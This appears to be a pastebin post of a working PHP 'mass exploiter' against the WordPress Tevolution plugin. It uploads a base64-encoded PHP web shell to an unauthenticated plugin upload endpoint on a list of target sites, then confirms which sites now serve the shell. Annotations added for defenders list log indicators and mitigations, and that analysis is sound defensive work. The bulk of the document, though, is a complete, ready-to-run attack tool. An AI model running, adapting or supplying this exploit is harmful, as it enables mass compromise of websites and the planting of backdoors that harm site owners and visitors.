AgusSR

WordPress Plugins Tevolution Mass Xploiter

May 8th, 2016
  1. <html>
  2. <center>
  3. <form method="post" enctype="multipart/form-data">
  4. Shellname: <br><input type="text" name='filename' style='width: 500px;' height="10" value='indoxploit.php.xxxjpg' required><br>
  5. Target: <br><textarea name="url" style="width: 500px; height: 200px;" placeholder="http://www.target.com/"></textarea><br>
  6. <input type='submit' name='exp' value='Hajar!' style='width: 500px;'>
  7. </form>
  8. <?php
  9. // IndoXploit
  // Runtime setup: removes PHP's execution time limit and turns off all error
  // reporting, so a long target list runs to completion and failures are not
  // reported by PHP.
  10. set_time_limit(0);
  11. error_reporting(0);
  12.  
  // Flushes PHP's output buffer and then the system write buffer, so results
  // printed so far are sent to the operator's browser. Called once per target
  // by the loop at the end of the script.
  13. function buffer() {
  14.     ob_flush();
  15.     flush();
  16. }
  // Sends one HTTP POST of $payload to $url and returns the response body
  // (curl_exec() returns false on failure, which is passed straight back).
  //
  // Points a defender or analyst should note:
  //  - TLS peer and host verification are both switched off, so HTTPS targets
  //    are contacted regardless of certificate validity.
  //  - The User-Agent is copied from the request that invoked this script, so
  //    the target's access log shows the operator's browser string rather than
  //    a curl/PHP one; User-Agent filtering alone will not catch this traffic.
  //  - Cookies are read from and written to 'cookie.txt' in the working
  //    directory, which leaves that file behind on the host running the tool.
  //  - Redirects are followed.
  17. function curl($url, $payload) {
  18.     $ch = curl_init();
  19.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  20.           curl_setopt($ch, CURLOPT_URL, $url);
  21.           curl_setopt($ch, CURLOPT_POST, true);
  22.           curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  23.           curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  24.           curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  25.           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
            // Certificate validation disabled (see note above).
  26.           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  27.           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  28.           curl_setopt($ch, CURLOPT_HEADER, 0);
            // User-Agent mirrors whatever client requested this page.
  29.           curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  30.           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  31.     $res = curl_exec($ch);
  32.           curl_close($ch);
  33.     return $res;
  34. }
  // Main run. Summary for defenders: the script writes a small PHP upload page
  // to local disk, POSTs it as a multipart file to one fixed Tevolution plugin
  // path on every listed site, then requests the expected wp-content/uploads
  // URL to see whether the file is now served there.
  //
  // Indicators visible in this code:
  //  - POST requests to
  //    /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
  //    carrying a multipart field named "Filedata".
  //  - A follow-up GET for /wp-content/uploads/<year>/<month>/<filename>, where
  //    the form's default filename is 'indoxploit.php.xxxjpg'.
  //  - Files under wp-content/uploads containing the string
  //    "IndoXploit - Auto Xploiter".
  //  - On a host running this tool: a directory 'indoxploit_tools' and a file
  //    'cookie.txt' in the script's working directory.
  // Mitigation: remove or update the plugin, deny PHP execution under
  // wp-content/uploads, and search uploads for the marker string above.
  // NOTE(review): the script sends no credentials, so the endpoint presumably
  // accepts uploads without authentication; confirm against the plugin source.
  //
  // Filename for the dropped file; only HTML-escaped, not otherwise validated.
  35. $file = htmlspecialchars($_POST['filename']);
  // Target list, one base URL per line (split on CRLF only).
  36. $site = explode("\r\n", $_POST['url']);
  37. $do = $_POST['exp'];
  // Base64 of a short PHP page: it prints the banner "IndoXploit - Auto Xploiter"
  // and php_uname(), shows a file-upload form, and copies any uploaded file into
  // its own directory under the client-supplied name. The banner is the string
  // the success check below looks for.
  38. $uploader = base64_decode("PD9waHANCmVjaG8gIkluZG9YcGxvaXQgLSBBdXRvIFhwbG9pdGVyIjsNCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
  39. if($do) {
      // Year and month come from the clock of the machine running the script;
      // they are used to build the uploads/<year>/<month>/ URL checked below.
  40.     $y = date("Y");
  41.     $m = date("m");
      // Local staging directory; the mkdir() result is stored but never checked.
  42.     $idx_dir = mkdir("indoxploit_tools", 0755);
  43.     $shell = "indoxploit_tools/".$file;
      // Write the decoded page to disk so it can be attached to the POST.
      // The fopen() result is not checked.
  44.     $fopen = fopen($shell, "w");
  45.     fwrite($fopen, $uploader);
  46.     fclose($fopen);
  47.     foreach($site as $url) {
          // Fixed plugin endpoint appended to each base URL; this path is the
          // main thing to look for in web server access logs.
  48.         $target = $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php';
          // URL where the file is expected to be served if the upload was stored.
  49.         $cek_shell = "$url/wp-content/uploads/$y/$m/$file";
          // "@path" value: asks curl to attach the local file as the multipart
          // field "Filedata".
  50.         $data = array(
  51.             "Filedata" => "@$shell"
  52.             );
  53.         $curl = curl($target, $data);
          // Any non-empty response counts as "sent"; confirmation is the marker
          // string appearing in the body fetched from the uploads URL.
  54.         if($curl) {
  55.             $cek = file_get_contents($cek_shell);
  56.             if(preg_match("/IndoXploit - Auto Xploiter/is", $cek)) {
  57.                 echo "<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
  58.             }
  59.         }
      // Stream this target's result to the browser before moving on.
  60.     buffer();
  61.     }
  62. }
  63. ?>